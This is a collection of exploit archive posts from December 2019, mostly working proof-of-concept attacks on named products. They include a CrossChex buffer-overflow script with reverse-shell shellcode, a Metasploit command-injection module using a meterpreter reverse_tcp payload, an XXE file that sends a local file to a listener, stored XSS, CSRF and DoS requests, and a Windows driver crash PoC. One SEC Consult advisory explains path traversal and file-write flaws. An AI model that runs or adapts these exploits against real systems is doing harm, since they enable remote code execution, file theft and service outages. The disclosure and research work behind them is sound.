December 2, 2019, 11:25 am
NSAuditor version 3.1.8.0 suffers from a Key denial of service vulnerability.
MD5 | 35fb3894705a2007f79a99dca4f3eb6f# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
# Discovery by: SajjadBnd
# Date: 2019-11-30
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.1.8.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro
# Email : blackwolf@post.com
# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks
# and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise
# network for all potential methods that a hacker might use to attack it and create a report of potential
# problems that were found , Nsauditor network auditing software significantly reduces the total cost of
# network management in enterprise environments by enabling IT personnel and systems administrators gather
# a wide range of information from all the computers in the network without installing server-side applications
# on these computers and create a report of potential problems that were found.
# POC
# 1.Run the python script, it will create a new file "dos.txt"
# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of dos.txt into the Field: 'Key'
# 6.click 'ok'
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "\x41" * 1000
try:
f=open("dos.txt","w")
print "[+] Creating %s bytes DOS payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
↧
December 2, 2019, 11:25 am
Anviz CrossChex version 4.3.12 suffers from a buffer overflow vulnerability.
MD5 | 9138f4c491e1f718ef30d6e17993a44d# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: https://www.anviz.com/
# Software Link: https://www.anviz.com/download.html
# Version: Crosschex Standard x86 <= V4.3.12
# Tested on: 4.3.8.0, 4.3.12
# CVE : N/A
# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html
import socket
import time
import sys
import binascii
# Scapy for the broadcast packet with custom sport
from scapy.all import Raw,IP,Dot1Q,UDP,Ether
import scapy.all
# shellcode working calc.exe
calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
# shellcode windows x86 reverse_shell
shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68"
# shellcode windows x86 reverse_shell (part_2)
shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
def ipToShellcode(ip):
a = ip.split('.')
b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))
b = b.replace("0x","")
return binascii.unhexlify(b)
# sport has to be 5060
def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
request = b"A"*77 # Original payload substitute
request += b"B"*184
request += b"\x07\x18\x42\x00" # EIP - 00421807 crosscheck_standard.exe
request += b"A"*4
# 269 bytes
if len(sys.argv) > 2:
request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
else:
request = request + calculator_payload
scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )
def setFuzzUDPServer(ip='', port=5050, timeout=150):
try :
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print('[!] Failed to create server socket')
try:
s.bind(('', port))
except:
print('[*] Server socket bind failed')
sys.exit()
print('[*] Waiting for crosschex')
s.settimeout(timeout)
timeout = time.time() + timeout
responses = []
while True:
if time.time() > timeout:
break
try:
response = s.recvfrom(1024)
print(response)
responses.append(response)
sendFuzzingUDPBroadcast(ip=ip)
response = s.recvfrom(1024)
except socket.timeout:
print("[!] Error with UDP server")
s.close()
return responses
nargs = len(sys.argv)
if nargs < 2:
print("[*] Usage: python3 %s <network_interface> [<ip>]\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
sys.exit(0)
setFuzzUDPServer()
↧
↧
December 2, 2019, 11:26 am
Dokuwiki version 2018-04-22b suffers from a username enumeration vulnerability.
MD5 | e7533fa839fdd496e040a3329ea00401# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
# Date: 2019-12-01
# Exploit Author: Talha ŞEN
# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
# Software Link: https://download.dokuwiki.org/
# Version: 2018-04-22b "Greebo"
# Tested on:
# Alpine Linux 3.5 (docker image)
# PHP 5.6.30
# Apache/2.4.25 (Unix)
# CVE :
# At login page there is a "set new password" page as below:
# Forgotten your password? Get a new one: Set new password
# At this page there is username enumeration vulnerability.
# Testing for non-valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1
sectok=&do=resendpwd&save=1&login=sss
# Response for non-valid user(sss):
<div class="error">Sorry, we can't find this user in our database.</div>
========================================================================
# Testing for valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1
sectok=&do=resendpwd&save=1&login=admin
# Response for valid user (admin):
<div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div>
<div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>
↧
December 2, 2019, 11:27 am
Microsoft Visual Studio 2008 Express IDE suffers from an XML external entity injection vulnerability.
MD5 | 789e0a22b8214672e24e1c11ee00b829[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Visual Studio 2008 Express IDE
vcsetup.exe
File hash: 62f764849e8fcdf8bfbc342685641304
Download: http://go.microsoft.com/?linkid=7729279
[Vulnerability Type]
XML External Entity Injection 0Day
[CVE Reference]
N/A
[Security Issue]
Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.
By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the
remote attackers server.
Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get
associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.
[Vuln XXE file types]
.snippet
.i
.s
.asm
.disco
.lst
.inc
.srf
.wsdl
.rgs
.xml
This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.
[References]
https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/
[Exploit/POC]
"Evil.snippet" or any of the extensions mentioned above.
<?xml version="1.0"?>
<!DOCTYPE knobgobslob [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
python -m SimpleHTTPServer
python -m http.server (Python3)
[POC Video URL]
https://www.youtube.com/watch?v=QOZlwzsbPrk
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: 3/24/2017
MSRC sent me link to "Definition of a Security Vulnerability"
Also Product is also not supported anymore.
December 1, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
↧
December 2, 2019, 11:39 am
sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.
MD5 | c2cc97b70eead019d4bca860e3b7ce45
↧
↧
December 2, 2019, 11:40 am
This Metasploit module exploits a command injection in Ajenti version 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
MD5 | 7c4130c9c91b99ff51567ab20d19ea6e##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ajenti auth username Command Injection',
'Description' => %q{
This module exploits a command injection in Ajenti == 2.1.31.
By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
},
'Author' => [
'Jeremy Brown', # Vulnerability discovery
'Onur ER <onur@onurer.net>' # Metasploit module
],
'References' => [
['EDB', '47497']
],
'DisclosureDate' => '2019-10-14',
'License' => MSF_LICENSE,
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Privileged' => false,
'Targets' => [
['Ajenti == 2.1.31', {}]
],
'DefaultOptions' =>
{
'RPORT' => 8000,
'SSL' => true,
'payload' => 'python/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0
))
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => '/view/login/normal'
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.body =~ /ajenti/i
return CheckCode::Safe
end
version = res.body.scan(/'ajentiVersion', '([\d\.]+)'/).flatten.first
if version
vprint_status "Ajenti version #{version}"
end
if version == '2.1.31'
return CheckCode::Appears
end
CheckCode::Detected
end
def exploit
print_status('Exploiting...')
json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
'password' => rand_text_alpha_lower(7),
'mode' => 'normal'
}
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),
'ctype' => 'application/json',
'data' => JSON.generate(json_body)
})
end
end
↧
December 2, 2019, 3:08 pm
SALTO ProAccess SPACE versions 5.5 and below suffer from path traversal, arbitrary file write, persistent cross site scripting, privilege escalation, and clear text transmission of sensitive data vulnerabilities.
MD5 | 4ca7d9b553568cfa84f8e2a9b3783f36SEC Consult Vulnerability Lab Security Advisory < 20191202-0 >
=======================================================================
title: Multiple Critical Vulnerabilities
product: SALTO ProAccess SPACE
vulnerable version: <= v5.5
fixed version: >= v5.6
CVE number: CVE-2019-19457, CVE-2019-19458, CVE-2019-19459,
CVE-2019-19460
impact: critical
homepage: https://www.saltosystems.com/en/
found: 2019-05-22
by: Werner Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"SALTO ProAccess SPACE Software is a powerful access control management
tool that enables you to program access time zones for each user,
manage different calendars and obtain audit trails from each door
to see who has passed through it. The software includes special
functions such as automatic door status changes, anti-passback
and relay management.
Thanks to its advanced software features, SALTO ProAccess SPACE is also
one of the most user-friendly and powerful software products for the
access control management of stand-alone wireless devices, and IP
online devices in one converged complete access control platform
for the user, keys and doors management."
Source: http://proaccess-space.saltosystems.com/features/
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.
Vulnerability overview/description:
-----------------------------------
1. Path Traversal (CVE-2019-19458)
Path traversal vulnerabilities allow attackers access to files
and directories outside the application root through relative file paths
in the user input. During a quick security check, multiple locations
in the web application were identified, which allow an attacker
to traverse outside of the application root. The vulnerabilities got
identified in the "Data Export" as well as "Database Export"
functionality. Those vulnerabilities can for example be used to dump the
whole database into the web root, by traversing outside of the application
root.
2. Arbitrary File Write (CVE-2019-19459)
By further exploiting the path traversal vulnerability inside of the
"Data Export" feature, an attacker is able to traverse into arbitrary paths
and write arbitrary files with arbitrary contents. Some examples are files
to the web root, or bat files into auto start. This allows an attacker to
execute arbitrary commands on the server.
3. Stored Cross-Site-Scripting (CVE-2019-19457)
By adding devices to the SALTO network with a JavaScript payload inside of
certain parameters, an attacker is able to permanently embed arbitrary
JavaScript payloads inside of the web application.
4. Webserver running as SYSTEM (Windows Service) per Default (CVE-2019-19460)
The webserver of the SALTO ProAccess SPACE is running as a Windows Service with
local SYSTEM permissions per default. This is against the principle of least
privilege. An attacker, who is able to exploit the path traversal, or arbitrary
file write vulnerability, is basically able to write to every single path
on the file system, because the webserver is running with the highest
privileges available.
5. Authorization Issues
Multiple API calls were identified in the SALTO ProAccess SPACE web application,
that could normally only be called by high privileged users. Nevertheless, by
directly calling the API with the OAuth token of a low privileged user, it was
possible to call some API calls that shouldn't be available to them.
6. Cleartext transmission of sensitive data
The SALTO ProAccess SPACE web application allows their users to create so called
event streams. Those streams can be used to log events centrally. The stream
is transmitted via TCP/UDP in JSON, or CSV format. The stream is transmitted in
cleartext and leaks sensitive data such as who opened which door and when
including card ids etc.
Proof of concept:
-----------------
1. Path Traversal (CVE-2019-19458)
The "Data Export" as well as the "Database Export" features in
SALTO ProAccess SPACE allow users to specify a filename for the different
exports. By using special characters inside of the filename, an attacker is
able to traverse outside of the designated export path and place the exports
in arbitrary locations. For example, the following filename can be used
in the database export to store the database backup inside of the webroot:
..\..\..\..\SALTO\ProAccess Space\bin\webapp\backup.db
The file can then be easily retrieved via the following link without
authentication:
http(s)://$IP/backup.db
2. Arbitrary File Write (CVE-2019-19459)
The vulnerability described above can be further developed into an arbitrary
file write vulnerability by using the "Data Export" functionality. The webapp
lets their users choose an export filename and the fields, which should be
exported (e.g. Username, Notes field). To store a file with arbitrary contents
on the file system the following steps have to be conducted:
a. Store the payload inside of an arbitrary field, that can be manipulated by the
user. (E.g. Username is set to "<img src=x onerror=alert(document.location)>"
as an example for stored XSS)
b. Create a new export with the following export file name
"..\..\SALTO\ProAccess Space\bin\webapp\sectest.html"
c. Finalize the export
d. Access the file without authentication via http(s)://$IP/sectest.html
3. Stored Cross-Site-Scripting (CVE-2019-19457)
By injecting arbitrary JavaScript payloads inside of the name of a SALTO
network device (e.g. RFID Wall Reader) an attacker is able to permanently
embed malicious JavaScript code inside of the web application that is
executed as soon as certain pages are visited.
4. Webserver running as SYSTEM (Windows Service) per Default (CVE-2019-19460)
In a standard configuration the SALTO service, which is also serving the
webserver on port 8100 is running as a local windows service. Naturally, this
results in multiple issues. One of them is, that the webserver is automatically
running with SYSTEM privileges.
5. Authorization Issues
The following API calls can be accessed by a low privileged user without any
permissions (except login permissions) set:
/rpc/DirectoryExists
/rpc/GetLicense
Those API calls can be perfectly used to evaluate, which folders exist on the
file system.
6. Cleartext transmission of sensitive data
No PoC available.
Vulnerable / tested versions:
-----------------------------
The following versions have been tested:
* SALTO ProAccess SPACE 5.4.3.0
* Service Binary Version 4.13.3.404
Vendor contact timeline:
------------------------
2019-05-24: Contacting vendor through info@saltosystems.com
2019-05-24: Initial response from Salto Systems; providing a PGP public key for
encrypted communication
2019-05-24: Sending the encrypted advisory to Salto Systems
2019-06-11: Requesting a status update.
2019-06-12: Vendor responded with a detailed plan on how and when
the vulnerabilities are going to be fixed.
2019-09-02: Requesting status update.
2019-09-04: Vendor provides version information and further release plan updates
2019-09 - 2019-11: Multiple emails exchanged and telephone conferences discussing
the vulnerabilities
2019-12-02: Coordinated advisory release.
Solution:
---------
Update to SALTO ProAccess SPACE 5.6 which is available to customers through the
vendor's software area.
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Werner Schober / @2019
↧
December 4, 2019, 3:46 pm
Intelbras Router RF1200 version 1.1.3 suffers from a cross site request forgery vulnerability.
MD5 | c32a1780d648466fdd3ed05a4ada139b# Exploit Title: Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery
# Date: 2019-11-06
# Exploit Author: Joas Antonio
# Vendor Homepage: intelbras.com.br
# Software Link: https://www.intelbras.com/pt-br/roteador-wireless-smart-dual-band-action-rf-1200
# Version: 1.1.3 (REQUIRED)
# Tested on: Windows
# CVE : CVE-2019-19516
#POC1:
<html>
<body>
<form method="POST" action="http://IPROUTERRF1200/login/Auth">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="21232f297a57a5a743894a0e4a801fc3"/> <!-- password admin -->
<input type="submit" value="Submit">
</form>
</body>
<html>
↧
December 4, 2019, 3:46 pm
Online Invoicing System version 2.6 suffers from a persistent cross site scripting vulnerability.
MD5 | d8fbb7aa32b5447f037e171048323f77# Exploit Title: Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting
# Date: 2019-11-29
# Exploit Author: Cemal Cihad ÇİFTÇİ
# Vendor Homepage: https://bigprof.com
# Software Download Link : https://github.com/bigprof-software/online-invoicing-system
# Software : Online Invoicing System
# Version : 2.6
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# Stored XSS has been discovered in the Online Invoicing System created by bigprof/AppGini
# editmembers section. Description parameter affected from this vulnerability.
# payload: <script>alert(123);</script>
# HTTP POST request
POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
Host: 10.10.10.160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 464
Origin: http://10.10.10.160
Connection: close
Referer: http://10.10.10.160/inovicing/app/admin/pageEditGroup.php?groupID=2
Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69
Upgrade-Insecure-Requests: 1
groupID=2&name=Admins&description=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&visitorSignup=0&invoices_insert=1&invoices_view=3&invoices_edit=3&invoices_delete=3&clients_insert=1&clients_view=3&clients_edit=3&clients_delete=3&item_prices_insert=1&item_prices_view=3&item_prices_edit=3&item_prices_delete=3&invoice_items_insert=1&invoice_items_view=3&invoice_items_edit=3&invoice_items_delete=3&items_insert=1&items_view=3&items_edit=3&items_delete=3&saveChanges=1
↧
↧
December 4, 2019, 3:47 pm
Online Clinic Management System version 2.2 suffers from a html injection vulnerability.
MD5 | b2e8b9ed2bb7a8503bcc774fe443d4a1# Exploit Title: Online Clinic Management System 2.2 - HTML Injection
# Date: 2019-11-29
# Exploit Author: Cemal Cihad ÇİFTÇİ
# Vendor Homepage: https://bigprof.com
# Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
# Software : Online Clinic Management System
# Version : 2.2
# Vulernability Type : HTML Injection
# Vulenrability : HTM Injection
# HTML Injection has been discovered in the Online Clinic Management System created by bigprof/AppGini
# add disase symptom, patient and appointment section.
# payload: <b><i>asd</i></b>
# HTTP POST request
POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
Host: 10.10.10.160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
POST /clinic/disease_symptoms_view.php HTTP/1.1
Host: 10.10.10.160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------325041947016922
Content-Length: 1501
Origin: http://10.10.10.160
Connection: close
Referer: http://10.10.10.160/clinic/disease_symptoms_view.php
Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69; online_clinic_management_system=e3fqbalmcu4o9d4tvuuakpn9e8
Upgrade-Insecure-Requests: 1
-----------------------------325041947016922
Content-Disposition: form-data; name="current_view"
DV
-----------------------------325041947016922
Content-Disposition: form-data; name="SortField"
-----------------------------325041947016922
Content-Disposition: form-data; name="SelectedID"
1
-----------------------------325041947016922
Content-Disposition: form-data; name="SelectedField"
-----------------------------325041947016922
Content-Disposition: form-data; name="SortDirection"
-----------------------------325041947016922
Content-Disposition: form-data; name="FirstRecord"
1
-----------------------------325041947016922
Content-Disposition: form-data; name="NoDV"
-----------------------------325041947016922
Content-Disposition: form-data; name="PrintDV"
-----------------------------325041947016922
Content-Disposition: form-data; name="DisplayRecords"
all
-----------------------------325041947016922
Content-Disposition: form-data; name="disease"
<b><i>asd</i></b>
-----------------------------325041947016922
Content-Disposition: form-data; name="symptoms"
<b><i>asd</i></b>
-----------------------------325041947016922
Content-Disposition: form-data; name="reference"
-----------------------------325041947016922
Content-Disposition: form-data; name="update_x"
1
-----------------------------325041947016922
Content-Disposition: form-data; name="SearchString"
-----------------------------325041947016922--
↧
December 4, 2019, 3:48 pm
Cisco WLC 2504 version 8.9 suffers from a denial of service vulnerability.
MD5 | 9215aa968b49d3b98e32f665f3d9a9ea# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-11-25
# Exploit Author: SecuNinja
# Vendor Homepage: cisco.com
# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
# Version: 8.4 to 8.9
# Tested on: not applicable, works independent from OS
# CVE : CVE-2019-15276
# Exploit PoC:
https://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'><img src="xxxxx">
# Firing this code will cause the system to reload which results in a DoS condition.
↧
December 4, 2019, 3:50 pm
Microsoft Windows suffers from an issue where a null pointer deference exists in the WARPGPUCMDSYNC function of the BasicRender.sys driver. An unprivileged user can trigger the vulnerability to crash the system and deny the service to the rest of the users.
MD5 | 64e7b7be479ae3ec443e4544303c901cA Null pointer deference exists in the WARPGPUCMDSYNC function of the
BasicRender.sys driver. An unprivileged user can trigger the vulnerability
to crash the system and deny the service to the rest of the users.
*PoC:*
#include <Windows.h>
#include <d3dkmthk.h>
D3DKMT_CREATEDEVICE* device = NULL;
device = new D3DKMT_CREATEDEVICE();
D3DKMT_ENUMADAPTERS enumAdapter = { 0 };
D3DKMTEnumAdapters(&enumAdapter);
device->hAdapter = enumAdapter.Adapters[1].hAdapter;
logger(log_counter, "EnumAdapter");
D3DKMTCreateDevice(device);
D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL;
contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL();
memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL));
contextVirtual->hDevice = device->hDevice;
char data[0x200] = { 0 };
memset(data, 0xff, 0x200);
contextVirtual->PrivateDriverDataSize = 0x200;
contextVirtual->pPrivateDriverData = data;
contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10;
contextVirtual->Flags.InitialData = 0x000001;
contextVirtual->Flags.NullRendering = 0x0;
D3DKMT_SUBMITCOMMAND* submitCommand = NULL;
submitCommand = new D3DKMT_SUBMITCOMMAND();
submitCommand->BroadcastContext[0] = 0x40000240;
for (int i = 0; i < 0x10; i++)
submitCommand->WrittenPrimaries[i] = 0x0;
submitCommand->PresentHistoryToken = 0x100;
submitCommand->Commands = 0x004b39;
submitCommand->CommandLength = 0x00000d;
submitCommand->BroadcastContext[0] = contextVirtual->hContext;
submitCommand->BroadcastContextCount = 0x1;
submitCommand->Flags.PresentRedirected = 0x1;
submitCommand->PrivateDriverDataSize = 0x130;
char* PrivateData = NULL;
PrivateData = new char[submitCommand->PrivateDriverDataSize];
memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize);
*(DWORD*)(PrivateData + 0x118) = 0x434e5953;
*(DWORD*)(PrivateData + 0x11c) = 0x18;
*(DWORD*)(PrivateData + 0x120) = 0x000110;
*(DWORD*)(PrivateData + 0x124) = 0x000420;
*(DWORD*)(PrivateData + 0x128) = 0x0;
